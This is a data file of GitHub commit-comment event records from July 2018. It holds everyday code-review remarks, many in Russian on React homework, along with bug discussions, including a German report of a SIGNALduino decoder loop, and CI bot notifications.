{"id":"7925066681","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612348,"position":38,"line":38,"path":"src/mutations/CreateRecipeForm.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:13:49Z","updated_at":"2018-07-05T19:13:49Z","author_association":"NONE","body":"Удаляй console.log-и, это мусор"}},"created_at":"2018-07-05T19:13:49Z"}
{"id":"7925067086","type":"CommitCommentEvent","actor":{"login":"waknot"},"repo":{"name":"waknot/Bomberman"},"payload":{"comment":{"id":29612350,"position":null,"line":null,"path":null,"commit_id":"7dd68e746eabf3c6940a76985131e31ee5c7fd8b","created_at":"2018-07-05T19:13:55Z","updated_at":"2018-07-05T19:13:55Z","author_association":"OWNER","body":"good"}},"created_at":"2018-07-05T19:13:55Z"}
{"id":"7925069559","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612358,"position":41,"line":41,"path":"src/mutations/CreateRecipeForm.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:14:31Z","updated_at":"2018-07-05T19:14:31Z","author_association":"NONE","body":"Не используй this.state в setState.\r\nthis.setState(prevState => ({ ingredients: [...prevState.ingredients, obj] }));"}},"created_at":"2018-07-05T19:14:31Z"}
{"id":"7925070449","type":"CommitCommentEvent","actor":{"login":"nicholasjhorton"},"repo":{"name":"Amherst-Statistics/IPS9inR"},"payload":{"comment":{"id":29612360,"position":null,"line":null,"path":null,"commit_id":"357d3d828ae6a4e9b0fc65d04d35478c50136247","created_at":"2018-07-05T19:14:44Z","updated_at":"2018-07-05T19:14:44Z","author_association":"CONTRIBUTOR","body":"I just posted the materials to the website but unfortunately @bonnfire your links aren't correct (see this fix in partIV.Rmd).  Can you please update?"}},"created_at":"2018-07-05T19:14:44Z"}
{"id":"7925070961","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29612363,"position":58,"line":58,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T19:14:51Z","updated_at":"2018-07-05T19:14:51Z","author_association":"CONTRIBUTOR","body":"Everything uses itemtype so what is the issue?"}},"created_at":"2018-07-05T19:14:51Z"}
{"id":"7925071254","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612366,"position":41,"line":41,"path":"src/mutations/CreateRecipeForm.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:14:55Z","updated_at":"2018-07-05T19:14:55Z","author_association":"NONE","body":"https://medium.com/@wereHamster/beware-react-setstate-is-asynchronous-ce87ef1a9cf3"}},"created_at":"2018-07-05T19:14:55Z"}
{"id":"7925074943","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612380,"position":80,"line":80,"path":"src/mutations/CreateRecipeForm.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:15:47Z","updated_at":"2018-07-05T19:15:47Z","author_association":"NONE","body":"Тут не нужно было [...arr] делать.\r\n\r\n```\r\ngetArr = arr => arr.map(({ name }) => name)\r\n```"}},"created_at":"2018-07-05T19:15:47Z"}
{"id":"7925075491","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612381,"position":80,"line":80,"path":"src/mutations/CreateRecipeForm.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:15:55Z","updated_at":"2018-07-05T19:15:55Z","author_association":"NONE","body":"Ну и название ужасное"}},"created_at":"2018-07-05T19:15:55Z"}
{"id":"7925077744","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612385,"position":123,"line":123,"path":"src/mutations/CreateRecipeForm.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:16:27Z","updated_at":"2018-07-05T19:16:27Z","author_association":"NONE","body":"Сравниваешь string с number"}},"created_at":"2018-07-05T19:16:27Z"}
{"id":"7925077928","type":"CommitCommentEvent","actor":{"login":"pwalczysko"},"repo":{"name":"ome/training-scripts"},"payload":{"comment":{"id":29612388,"position":20,"line":20,"path":"maintenance/scripts/delete_ROIs.py","commit_id":"9a31c2f9955ad88ce4941e1278e09ea094764a5b","created_at":"2018-07-05T19:16:30Z","updated_at":"2018-07-05T19:16:30Z","author_association":"MEMBER","body":"Interestingly, the output of the script indeed has 33 lines, which corresponds with the image number in that dataset. But the ROIs persist in the UI.... Note, in the output below, there are the last two lines which indicate that on the last 2 images of that dataset there should be 3 and 5 ROIs. And that is exactly how much I later, after this script finished, still found on those two images.\r\n\r\n```\r\nDeleting 12 ROIs...\r\nDeleting 7 ROIs...\r\nDeleting 11 ROIs...\r\nDeleting 12 ROIs...\r\nDeleting 13 ROIs...\r\nDeleting 16 ROIs...\r\nDeleting 11 ROIs...\r\nDeleting 42 ROIs...\r\nDeleting 45 ROIs...\r\nDeleting 60 ROIs...\r\nDeleting 38 ROIs...\r\nDeleting 8 ROIs...\r\nDeleting 25 ROIs...\r\nDeleting 49 ROIs...\r\nDeleting 39 ROIs...\r\nDeleting 27 ROIs...\r\nDeleting 22 ROIs...\r\nDeleting 22 ROIs...\r\nDeleting 11 ROIs...\r\nDeleting 15 ROIs...\r\nDeleting 7 ROIs...\r\nDeleting 10 ROIs...\r\nDeleting 15 ROIs...\r\nDeleting 9 ROIs...\r\nDeleting 10 ROIs...\r\nDeleting 6 ROIs...\r\nDeleting 13 ROIs...\r\nDeleting 39 ROIs...\r\nDeleting 8 ROIs...\r\nDeleting 8 ROIs...\r\nDeleting 6 ROIs...\r\nDeleting 3 ROIs...\r\nDeleting 5 ROIs...\r\n```"}},"created_at":"2018-07-05T19:16:30Z"}
{"id":"7925080975","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612394,"position":33,"line":33,"path":"src/queries/RecipeList.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:17:02Z","updated_at":"2018-07-05T19:17:02Z","author_association":"NONE","body":"Ну чувааак, что за названия"}},"created_at":"2018-07-05T19:17:02Z"}
{"id":"7925082115","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"AndreyMyssak/Homework-apollo-client"},"payload":{"comment":{"id":29612395,"position":43,"line":43,"path":"src/queries/RecipeList.js","commit_id":"08cad6ffc93a3e70d994325e7d7ccdcd400611d7","created_at":"2018-07-05T19:17:16Z","updated_at":"2018-07-05T19:17:16Z","author_association":"NONE","body":"Тебе не нужен этот View"}},"created_at":"2018-07-05T19:17:16Z"}
{"id":"7925082331","type":"CommitCommentEvent","actor":{"login":"rbomhof"},"repo":{"name":"rbomhof/irc-d8-workflow"},"payload":{"comment":{"id":29612397,"position":null,"line":null,"path":null,"commit_id":"e2d6e88c99d0ed166f941b7d5ac065c2ce716a9b","created_at":"2018-07-05T19:17:20Z","updated_at":"2018-07-05T19:17:20Z","author_association":"OWNER","body":"Created multidev environment [irc-d8-workflow#aug-18](https://dashboard.pantheon.io/sites/0c518be8-4ef1-48d0-bf17-f9310a806c4d#aug-18).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://aug-18-irc-d8-workflow.pantheonsite.io/)"}},"created_at":"2018-07-05T19:17:20Z"}
{"id":"7925084367","type":"CommitCommentEvent","actor":{"login":"HomeAutoUser"},"repo":{"name":"RFD-FHEM/RFFHEM"},"payload":{"comment":{"id":29612401,"position":null,"line":null,"path":null,"commit_id":"5b24ee8334d09ec08594b2a238b6138a005e2086","created_at":"2018-07-05T19:17:47Z","updated_at":"2018-07-05T19:17:47Z","author_association":"CONTRIBUTOR","body":"Guten Abend,\r\n@elektron-bbs und ich haben heute mal diverse Tests gemacht und sind wie schon angesprochen auf die Endlosschleife gestoßen welche uns ebenso fix das Log füllte oder das Programm zum hängen brachte.\r\n\r\nDas Ganze ist nachvollziebar mit einem Dispatch Befehl wenn man diese ID nutzt ( Das ist die selbige wie 17.1 nur als MU erkannt obwohl es eine MS ist)\r\n\r\n```\r\n     \"17.2\"\t=> # intertechno --> MU\r\n #\t\t\t# MU;P0=344;P1=-1230;P2=-200;D=01020201020101020102020102010102010201020102010201020201020102010201020101020102020102010201020102010201010200;CP=0;R=0;\r\n #\t\t\t# MU;P0=346;P1=-1227;P2=-190;P4=-10224;P5=-2580;D=0102010102020101020201020101020102020102010102010201020102010201020201020102010201020101020102020102010102020102010201020104050201020102010102020101020201020101020102020102010102010201020102010201020201020102010201020101020102020102010102020102010201020;CP=0;R=0;\r\n #\t\t\t# MU;P0=351;P1=-1220;P2=-185;D=01 0201 0102 020101020201020101020102020102010102010201020102010201020201020102010201020101020102020102010201020102010201020100;CP=0;R=0;\r\n #\t\t\t# MU;P0=355;P1=-189;P2=-1222;P3=-10252;P4=-2604;D=01020201010201020201020101020102020102010201020102010201010201020102010201020201020101020102010201020102010201020 304 0102 01020102020101020201010201020201020101020102020102010201020102010201010201020102010201020201020101020102010201020102010201020 304 01020;CP=0;R=0;\r\n#\t\t\t# https://www.sweetpi.de/blog/329/ein-ueberblick-ueber-433mhz-funksteckdosen-und-deren-protokolle\r\n{\r\n \t\t\tname\t\t\t=> 'intertechno',\r\n \t\t\tcomment \t\t=> 'PIR-1000 | ITT-1500',\r\n \t\t\tid          => '17.2',\r\n \t\t\tone\t\t\t=> [1,-5,1,-1],\r\n \t\t\tzero\t\t\t=> [1,-1,1,-5],\r\n \t\t\tclockabs    => 230,\t\t\t# -1 = auto\r\n \t\t\tformat \t\t=> 'twostate',\t# tristate can't be migrated from bin into hex!\r\n \t\t\tpreamble\t\t=> 'i',\t\t\t# Append to converted message\t\r\n \t\t\tpostamble\t\t=> '00',\t\t# Append to converted message\t \t\r\n \t\t\tclientmodule    => 'IT',   \t\t# not used now\r\n \t\t\tmodulematch     => '^i......',  # not used now\r\n \t\t\tlength_min      => '32',\r\n \t\t\tlength_max     \t=> '34',\t\t# Don't know maximal lenth of a valid message\r\n \t\t\tpostDemodulation => \\&SIGNALduino_bit2Arctec,\r\n},\r\n```\r\n\t\t\r\nDas Signal von dem Device sieht so aus:\r\n>2018.07.05 15:05:36.619 4: sduino_USB0/msg READredu: MU;P0=-100;P1=319;P2=-1033;P3=-216;P4=-281;P6=-9476;P7=-2492;D=0121312131212141214131212141214131212131312121313121312121313121312131212131312131213121312121412131312131213121213131213121213161713121312131212131213131212131213131212131312121313121312121313121312131212131312131213121312121412131312131213121213131213;CP=1;R=0;\r\n\r\nMit einem Befehl wie:\r\n>get sduino_dummy raw MU;;P0=-100;;P1=319;;P2=-1033;;P3=-216;;P4=-281;;P6=-9476;;P7=-2492;;D=0121312131212141214131212141214131212131312121313121312121313121312131212131312131213121312121412131312131213121213131213121213161713121312131212131213131212131213131212131312121313121312121313121312131212131312131213121312121412131312131213121213131213;;CP=1;;R=0;;\r\n\r\nhaben wir die Schleife mehrfach rekonstruieren können.\r\n\r\nBeim Testen habe ich mal 2 Logausgaben hineingenommmen um zu sehen wo es \"schleift\".\r\n**Codeauszug:**\r\n```\r\n\t\t\t\t\t$valid = $valid && $ProtocolListSIGNALduino{$id}{length_min} <= scalar @bit_msg  if (defined($ProtocolListSIGNALduino{$id}{length_min})); \r\n\r\n\t\t\t\t\tSIGNALduino_Log3 $name, 3, \"$name: Test 2 - Schleife!!! $valid\"; ####### ENDLOSSCHLEIFE HIER !!!!! NACHVOLLZIEHBAR!!\r\n\t\t\t\t\t#next if (!$valid);  ## Last chance to try next protocol if there is somethin invalid\r\n\t\t\t\t\tif ($valid) {\r\n```\r\n\r\nDort ist die Wiederkehrende Schleife im Durchlauf.\r\nDas Siganl sieht orginal so aus.\r\n\r\n![signal](https://user-images.githubusercontent.com/25631927/42343235-b40306c6-8098-11e8-843b-7e3d7e84c4f4.jpg)"}},"created_at":"2018-07-05T19:17:47Z"}
{"id":"7925085560","type":"CommitCommentEvent","actor":{"login":"RiccBallard"},"repo":{"name":"1thumbbmcc/wowcache"},"payload":{"comment":{"id":29612406,"position":null,"line":null,"path":null,"commit_id":"24e3eaf18f52df59342916011a5b7556689f579d","created_at":"2018-07-05T19:18:05Z","updated_at":"2018-07-05T19:18:05Z","author_association":"NONE","body":"thank you **VERY** much!!"}},"created_at":"2018-07-05T19:18:05Z"}
{"id":"7925087174","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612412,"position":32,"line":36,"path":"Dodo.RestaurantBoard.Tests/UuidTests.cs","commit_id":"762f7bba22f72419a56616c3a8a7c4a5bdab6426","created_at":"2018-07-05T19:18:28Z","updated_at":"2018-07-05T19:18:28Z","author_association":"MEMBER","body":"Стало намного хуже читаться. Теперь чтобы понять, что такое unsuitable characters, мне надо искать объявление константы, а раньше это было прямо в тесте. А что это unsuitable - было понятно из названия теста."}},"created_at":"2018-07-05T19:18:28Z"}
{"id":"7925087264","type":"CommitCommentEvent","actor":{"login":"ianknowles"},"repo":{"name":"crahal/centgovspend"},"payload":{"comment":{"id":29612413,"position":null,"line":null,"path":null,"commit_id":"a6fc3acabfe0c7580b469f53fc6a6d233e25339b","created_at":"2018-07-05T19:18:29Z","updated_at":"2018-07-05T19:18:29Z","author_association":"NONE","body":"Most department functions seem to repeat the same steps. It can probably be rewritten as mostly data lists and patterns etc that are passed to common functions"}},"created_at":"2018-07-05T19:18:29Z"}
{"id":"7925087942","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612417,"position":45,"line":46,"path":"Dodo.RestaurantBoard.Tests/UuidTests.cs","commit_id":"762f7bba22f72419a56616c3a8a7c4a5bdab6426","created_at":"2018-07-05T19:18:39Z","updated_at":"2018-07-05T19:18:39Z","author_association":"MEMBER","body":"Та же фигня"}},"created_at":"2018-07-05T19:18:39Z"}
{"id":"7925088089","type":"CommitCommentEvent","actor":{"login":"tkachpavlo1"},"repo":{"name":"tkachpavlo1/VelloProject"},"payload":{"comment":{"id":29612418,"position":null,"line":null,"path":null,"commit_id":"c3b565cb448cd92cfc28311639bee65f82cead69","created_at":"2018-07-05T19:18:41Z","updated_at":"2018-07-05T19:18:41Z","author_association":"OWNER","body":"q"}},"created_at":"2018-07-05T19:18:41Z"}
{"id":"7925090227","type":"CommitCommentEvent","actor":{"login":"bevzuk"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612426,"position":50,"line":50,"path":"Dodo.RestaurantBoard.Tests/UuidTests.cs","commit_id":"762f7bba22f72419a56616c3a8a7c4a5bdab6426","created_at":"2018-07-05T19:19:12Z","updated_at":"2018-07-05T19:19:12Z","author_association":"MEMBER","body":"Блин. Вообще непонятно что проверяет тест. Уберите константы."}},"created_at":"2018-07-05T19:19:12Z"}
{"id":"7925092223","type":"CommitCommentEvent","actor":{"login":"AnnyCaroline"},"repo":{"name":"AnnyCaroline/ceu-maker-gsoc"},"payload":{"comment":{"id":29612434,"position":5,"line":55,"path":"SelectDevice/SelectDevice/Form1.cs","commit_id":"cd832c2c76b59447e0f22e34ea8cfa9323131ae4","created_at":"2018-07-05T19:19:40Z","updated_at":"2018-07-05T19:19:40Z","author_association":"OWNER","body":"I think the problem was the separator defined in line 111.\r\n\r\nWhen listing all the boards, all the mcus from a board (if it requires some mcu*) are stored in a string separated by comma (line 111). When the user select a board from the list, the string that stores the mcus are split using a comma as separator (line 160). In this commit, the line 111 was changed, and I think the problem was solved.\r\n\r\n* For example, the arduino uno doesn't require any mcu definition when compiling, but arduino Mega does.\r\n-------------------------------------------------\r\nThe path used in line 55 is only used when the application is compiled in DEBUG mode. A relative path is used in line 60."}},"created_at":"2018-07-05T19:19:40Z"}
{"id":"7925092484","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"SergeyMyssak/nFactorial--Homework--Apollo-Client"},"payload":{"comment":{"id":29612435,"position":28,"line":28,"path":"App.js","commit_id":"dddf4d5642135d241976fa78dc5b8bdb736133e3","created_at":"2018-07-05T19:19:43Z","updated_at":"2018-07-05T19:19:43Z","author_association":"NONE","body":"впервые такое вижу"}},"created_at":"2018-07-05T19:19:43Z"}
{"id":"7925092905","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29612436,"position":78,"line":78,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T19:19:49Z","updated_at":"2018-07-05T19:19:49Z","author_association":"MEMBER","body":"it's not stupid, it's normal. "}},"created_at":"2018-07-05T19:19:49Z"}
{"id":"7925097432","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"SergeyMyssak/nFactorial--Homework--Apollo-Client"},"payload":{"comment":{"id":29612450,"position":10,"line":10,"path":"package.json","commit_id":"dddf4d5642135d241976fa78dc5b8bdb736133e3","created_at":"2018-07-05T19:20:54Z","updated_at":"2018-07-05T19:20:54Z","author_association":"NONE","body":"Стоило удалить все, связанное с TypeScript, если не используешь его."}},"created_at":"2018-07-05T19:20:54Z"}
{"id":"7925103178","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"SergeyMyssak/nFactorial--Homework--Apollo-Client"},"payload":{"comment":{"id":29612463,"position":41,"line":41,"path":"src/components/CreateRecipeForm.js","commit_id":"dddf4d5642135d241976fa78dc5b8bdb736133e3","created_at":"2018-07-05T19:22:04Z","updated_at":"2018-07-05T19:22:04Z","author_association":"NONE","body":"`arrOfIngredients` => `ingredients`\r\n\r\nлюбой JS dev понял бы, что ingredients это массив, просто из-за того что слово во множественном числе записано"}},"created_at":"2018-07-05T19:22:04Z"}
{"id":"7925103507","type":"CommitCommentEvent","actor":{"login":"paroga"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29612464,"position":30,"line":249,"path":"lib/email/receiver.rb","commit_id":"28dd7fb56231938141635cc08285368c8239bd6a","created_at":"2018-07-05T19:22:09Z","updated_at":"2018-07-05T19:22:09Z","author_association":"CONTRIBUTOR","body":"> Why do we want hidden posts for spam emails?\r\n\r\nIf we use a email address (e.g. info@example.com) for a category where everybody can write to, we get a high amount of spam. Most of the spam is detected correctly, but there are still some false positives. Marking those false positives as hidden post instead of rejecting them in the first place gives us possibility to handle false positives directly in Discourse. Otherwise we would need an additional tool, which keeps the false positive mails somewhere, so we could check them for ham and forward it manually to Discourse.\r\nI agree that it's not the most beautiful solution, but I gets the job done without introducing a whole new UI for spam handling."}},"created_at":"2018-07-05T19:22:09Z"}
{"id":"7925104105","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29612467,"position":58,"line":58,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T19:22:17Z","updated_at":"2018-07-05T19:22:17Z","author_association":"MEMBER","body":"in the last comment i meant to say \"itemtype has an issue right now where it will let itemstacks in,\" which might be why you are confused, i'll add a todo to change it when the conversion issue is fixed but for now it will stay itemstack"}},"created_at":"2018-07-05T19:22:17Z"}
{"id":"7925105490","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29612470,"position":78,"line":78,"path":"src/main/java/ch/njol/skript/effects/EffSendBlockChange.java","commit_id":"ab391c37417bba1d4044d89f957f7351b314acb1","created_at":"2018-07-05T19:22:38Z","updated_at":"2018-07-05T19:22:38Z","author_association":"CONTRIBUTOR","body":"and what you use is 97"}},"created_at":"2018-07-05T19:22:38Z"}
{"id":"7925106314","type":"CommitCommentEvent","actor":{"login":"Daenyth"},"repo":{"name":"gygrazok/witchmod"},"payload":{"comment":{"id":29612472,"position":7,"line":6,"path":"CHANGES","commit_id":"eb16565813a6672556c6ebc82bf80206393d10ba","created_at":"2018-07-05T19:22:49Z","updated_at":"2018-07-05T19:22:49Z","author_association":"NONE","body":"Does this \"draw\" count for things like `Wicked Claws`?"}},"created_at":"2018-07-05T19:22:49Z"}
{"id":"7925107343","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29612479,"position":null,"line":null,"path":null,"commit_id":"132fa8aa012aceabd29e2a7fdaec683e32c4ef5c","created_at":"2018-07-05T19:23:03Z","updated_at":"2018-07-05T19:23:03Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/71/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/71//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/132fa8aa012aceabd29e2a7fdaec683e32c4ef5c/71/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/132fa8aa012aceabd29e2a7fdaec683e32c4ef5c/71/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/132fa8aa012aceabd29e2a7fdaec683e32c4ef5c/71/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/132fa8aa012aceabd29e2a7fdaec683e32c4ef5c/71/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-05T19:23:03Z"}
{"id":"7925130055","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29612531,"position":null,"line":null,"path":null,"commit_id":"e4dc64a34b8f683f455befc9296724ad804b71ec","created_at":"2018-07-05T19:28:27Z","updated_at":"2018-07-05T19:28:27Z","author_association":"CONTRIBUTOR","body":"Still there are two tab characters"}},"created_at":"2018-07-05T19:28:27Z"}
{"id":"7925135955","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29612542,"position":14,"line":162,"path":"code/Example/Drasil/GlassBR/Body.hs","commit_id":"e858149662f74e29098af7585de233691541abcc","created_at":"2018-07-05T19:29:49Z","updated_at":"2018-07-05T19:29:49Z","author_association":"COLLABORATOR","body":"probably shouldn't be doing this since `relToQD` is a hack... should the original list of `QDefinition`s just be passed in here? should that list even be available to the Body or should it be using the list of `DataDefinition`s?"}},"created_at":"2018-07-05T19:29:49Z"}
{"id":"7925138406","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29612547,"position":null,"line":null,"path":null,"commit_id":"4ead81f22f6e57ec183c7b77ba46ba0a0a8bbc80","created_at":"2018-07-05T19:30:20Z","updated_at":"2018-07-05T19:30:20Z","author_association":"COLLABORATOR","body":"✅ [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/72/display/redirect) (on internal Jenkins) succeeded\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/72//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/4ead81f22f6e57ec183c7b77ba46ba0a0a8bbc80/72/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/4ead81f22f6e57ec183c7b77ba46ba0a0a8bbc80/72/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/4ead81f22f6e57ec183c7b77ba46ba0a0a8bbc80/72/jenkins-results/generator-diff/index.html) (please review changes)\n✅ [Test run succeeded](http://xamarin-storage/jenkins/xamarin-macios/xcode10/4ead81f22f6e57ec183c7b77ba46ba0a0a8bbc80/72/jenkins-results/tests/index.html)\n"}},"created_at":"2018-07-05T19:30:20Z"}
{"id":"7925141036","type":"CommitCommentEvent","actor":{"login":"Wphelp98737"},"repo":{"name":"Wphelp98737/didactic-enigma"},"payload":{"comment":{"id":29612552,"position":176,"line":176,"path":"LICENSE","commit_id":"8f020f36cbf39eba9e31c8fb6d025a18efe79936","created_at":"2018-07-05T19:30:55Z","updated_at":"2018-07-05T19:30:55Z","author_association":"OWNER","body":"\t+ TITLE، نقض غیرقانونی، خرید و فروش، یا FITNESS برای A"}},"created_at":"2018-07-05T19:30:55Z"}
{"id":"7925142957","type":"CommitCommentEvent","actor":{"login":"Wphelp98737"},"repo":{"name":"Wphelp98737/didactic-enigma"},"payload":{"comment":{"id":29612558,"position":1,"line":1,"path":"README.md","commit_id":"8f020f36cbf39eba9e31c8fb6d025a18efe79936","created_at":"2018-07-05T19:31:19Z","updated_at":"2018-07-05T19:31:19Z","author_association":"OWNER","body":"didactic-enigma "}},"created_at":"2018-07-05T19:31:19Z"}
{"id":"7925144279","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29612564,"position":12,"line":59,"path":"code/Language/Drasil/Document.hs","commit_id":"e858149662f74e29098af7585de233691541abcc","created_at":"2018-07-05T19:31:36Z","updated_at":"2018-07-05T19:31:36Z","author_association":"COLLABORATOR","body":"I did a lot of this duplication (i.e. `Data'`, `DDs'`, `ddefn'`, etc.). Was this a proper approach to migrating from depending on the raw `QDefinition` to the \"complete\" `DataDefinition`?"}},"created_at":"2018-07-05T19:31:36Z"}
{"id":"7925145711","type":"CommitCommentEvent","actor":{"login":"danielyan86129"},"repo":{"name":"danielyan86129/cs344-mysln"},"payload":{"comment":{"id":29612569,"position":32,"line":36,"path":"CMakeLists.txt","commit_id":"d4a944254957fe3c3ce351b1d71efaef9faaac49","created_at":"2018-07-05T19:31:55Z","updated_at":"2018-07-05T19:31:55Z","author_association":"OWNER","body":"because I used homebrew to install opencv2, which is a precompiled binary built using the now-standard-clang's **libc++ instead of the old libstdc++**."}},"created_at":"2018-07-05T19:31:55Z"}
{"id":"7925148621","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29612575,"position":13,"line":235,"path":"code/Language/Drasil/Reference.hs","commit_id":"e858149662f74e29098af7585de233691541abcc","created_at":"2018-07-05T19:32:35Z","updated_at":"2018-07-05T19:32:35Z","author_association":"COLLABORATOR","body":"If this is correct, this is a problem that'll eventually need to be investigated for #734."}},"created_at":"2018-07-05T19:32:35Z"}
{"id":"7925149040","type":"CommitCommentEvent","actor":{"login":"Blueyescat"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29612577,"position":null,"line":null,"path":null,"commit_id":"e4dc64a34b8f683f455befc9296724ad804b71ec","created_at":"2018-07-05T19:32:41Z","updated_at":"2018-07-05T19:32:41Z","author_association":"CONTRIBUTOR","body":"And i think you should use CollectionUtils"}},"created_at":"2018-07-05T19:32:41Z"}
{"id":"7925153933","type":"CommitCommentEvent","actor":{"login":"rjbain"},"repo":{"name":"rjbain/dgreat"},"payload":{"comment":{"id":29612592,"position":null,"line":null,"path":null,"commit_id":"9581c057e59e4030259a3cdf474a6b15f7208ef1","created_at":"2018-07-05T19:33:47Z","updated_at":"2018-07-05T19:33:47Z","author_association":"OWNER","body":"Created multidev environment [dgreat#pr-survey-u](https://dashboard.pantheon.io/sites/41cad7fe-472d-43a9-a470-d391b9622376#pr-survey-u).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-survey-u-dgreat.pantheonsite.io/)"}},"created_at":"2018-07-05T19:33:47Z"}
{"id":"7925158107","type":"CommitCommentEvent","actor":{"login":"xneg"},"repo":{"name":"dodopizza/restaurantboard-public"},"payload":{"comment":{"id":29612606,"position":5,"line":127,"path":"Dodo.Tests/UnitLunchParametersShould.cs","commit_id":"3e4dec8894bd6c98d1018acf98e1eb24925e29d4","created_at":"2018-07-05T19:34:46Z","updated_at":"2018-07-05T19:34:46Z","author_association":"NONE","body":"Согласен. Только я, с вашего позволения, напишу тест на один параметр, чтобы не плодить однотипные."}},"created_at":"2018-07-05T19:34:46Z"}
{"id":"7925158201","type":"CommitCommentEvent","actor":{"login":"binchik"},"repo":{"name":"YerkebulanDoroshev/recipe-app"},"payload":{"comment":{"id":29612607,"position":9,"line":9,"path":"src/CustomCard.js","commit_id":"03a096894a42817c1591ead9f0504280c73be20d","created_at":"2018-07-05T19:34:47Z","updated_at":"2018-07-05T19:34:47Z","author_association":"NONE","body":"Принято стили называть с маленькой буквы, как и все остальные properties в объектах"}},"created_at":"2018-07-05T19:34:47Z"}
